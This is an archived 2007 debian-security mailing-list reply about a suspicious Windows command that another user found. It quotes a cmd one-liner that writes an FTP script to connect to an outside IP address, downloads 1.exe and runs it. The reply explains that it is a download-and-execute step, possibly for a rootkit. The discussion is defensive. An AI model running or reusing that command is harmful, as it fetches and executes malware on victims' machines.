Re: spooky windows script

To: Jan Outhuis <jan.outhuis@orange.nl>
Cc: debian-security@lists.debian.org
Subject: Re: spooky windows script
From: Dale Amon <amon@vnl.com>
Date: Tue, 8 May 2007 14:27:04 +0100
Message-id: <20070508132704.GS6460@vnl.com>
In-reply-to: <3246512.31471178629044474.JavaMail.www@wwinf6103>
References: <3246512.31471178629044474.JavaMail.www@wwinf6103>

On Tue, May 08, 2007 at 02:57:24PM +0200, Jan Outhuis wrote:
> %systemroot%\system32\cmd.exe
> cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit

If you were running a windows system this might
do something really nasty since it creates a download
script and executes it. Perhaps to pull in a root kit?. 
I haven't done DOS in a long time so I am a bit shaky 
in fully interpreting.

Check for something named 1.exe in your directory.

Reply to:

References:
- spooky windows script
  - From: Jan Outhuis <jan.outhuis@orange.nl>

Prev by Date: spooky windows script
Next by Date: Re: spooky windows script
Previous by thread: spooky windows script
Next by thread: Re: spooky windows script
Index(es):
- Date
- Thread